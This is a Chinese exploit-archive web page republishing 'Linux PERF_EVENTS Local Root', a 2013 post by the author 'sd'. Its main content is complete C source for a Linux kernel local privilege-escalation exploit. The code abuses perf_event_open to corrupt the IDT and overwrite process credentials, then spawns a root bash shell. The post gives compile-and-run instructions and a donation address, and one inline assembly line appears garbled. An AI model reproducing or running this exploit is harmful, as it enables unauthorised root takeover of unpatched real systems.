首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux PERF_EVENTS Local Root
来源:sd@fucksheep.org 作者:sd 发布时间:2013-05-14  
/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
	int i,j,k;
	uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
	uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
	uint64_t kbase = ((uint64_t)current)>>36;
	uint32_t *fixptr = (void*) AB(1);
	*fixptr = -1;

	for (i=0; i<4000; i+=4) {
		uint64_t *p = (void *)&current[i];
		uint32_t *t = (void*) p[0];
		if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
		for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
			if (((uint32_t*)uids)[k] != t[j+k]) goto next;
			for (i = 0; i < 8; i++) t[j+i] = 0;
			for (i = 0; i < 10; i++) t[j+9+i] = -1;
			return;
next:;		}
	}
}

void sheep(uint32_t off) {
	uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
	int fd = syscall(298, buf, 0, -1, -1, 0);
	assert(!close(fd));
}


int	main() {
	uint64_t  u,g,needle, kbase, *p; uint8_t *code;
	uint32_t *map, j = 5;
	int i;
	struct {
		uint16_t limit;
		uint64_t addr;
	} __attribute__((packed)) idt;
	assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
	memset(map, 0, SIZE);
	sheep(-1); sheep(-2);
	for (i = 0; i < SIZE/4; i++) if (map[i]) {
		assert(map[i+1]);
		break;
	}
	assert(i<SIZE/4);
	asm ("sidt %0" : "=m" (idt));
	kbase = idt.addr & 0xff000000;
	u = getuid(); g = getgid();
	assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
	memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
	memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
		printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
	setresuid(u,u,u); setresgid(g,g,g);
	while (j--) {
		needle = AB(j+1);
		assert(p = memmem(code, 1024, &needle, 8));
		if (!p) continue;
		*p = j?((g<<32)|u):(idt.addr + 0x48);
	}
	sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
	asm("int ___FCKpd___0x4");	assert(!setuid(0));
	return execl("/bin/bash", "-sh", NULL);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kloxo 6.1.6 - Local Privilege
·Avira Personal Privilege Escal
·No-IP Dynamic Update Client (D
·ERS Viewer 2011 ERS File Handl
·SAP SOAP RFC SXPG_CALL_SYSTEM
·Kloxo 6.1.12 Privilege Escalat
·SAP SOAP RFC SXPG_COMMAND_EXEC
·Quick Search Version 1.1.0.189
·Lan Messenger sending PM Buffe
·Serva 32 TFTP 2.1.0 - Buffer O
·ERS Viewer 2011 ERS File Handl
·SSH User Code Execution
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved